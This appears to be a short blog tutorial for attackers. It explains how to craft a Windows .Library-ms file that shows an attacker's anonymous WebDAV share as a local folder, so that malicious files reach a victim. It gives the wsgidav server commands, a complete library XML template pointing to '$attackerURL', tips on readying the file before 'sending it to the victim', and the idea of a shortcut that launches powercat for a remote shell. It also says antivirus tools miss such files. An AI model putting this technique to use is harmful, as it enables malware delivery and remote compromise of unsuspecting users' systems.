Files with the extension .Library-ms are similar to macOS’s Volumes. They can contain files and directory which looks like local files on the Windows Explorer. Many AV/Malware systems does not detect them currently.
Create a Windows Library “Directory”
Preparation: Install somewhere a DAV share which is available from the victim’s system which points to a director which includes the malicous files. This can be done via the Apache2 module, or for testing purposes with Python:
$ pip3 install wsgidav$ /home/naturtrunken/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/naturtrunken/webdav
Create a XML file with the following content:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>$attackerURL</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Notes for the XML file:
- name has to be a library, see https://learn.microsoft.com/de-de/windows/win32/shell/library-schema-entry
- version can be any integer
- isLibraryPinned means, that this library is pinned to Windows Explorer’s navigation pane
- iconReference defines the icon. (See e.g. https://github.com/cyqsimon/W10-Ico-Ref)
- templateInfo defines which columns are shown by the Windows explorer. See https://learn.microsoft.com/en-us/windows/win32/shell/schema-library-foldertype for other column sets.
- $attackerURL is the URL of a server where the attacker provides a DAV share with the files he/she want to deliver to the victim.
Caution: After opening the “directory” the first time, Windows adds some values in the XML file which from now on only are valid on this computer. Therefore, take care to restore the content before sending it to the victim!
Now, the victim can execute a file there. You could also create a shortcut which executes powercat.
Leave a Reply
You must be logged in to post a comment.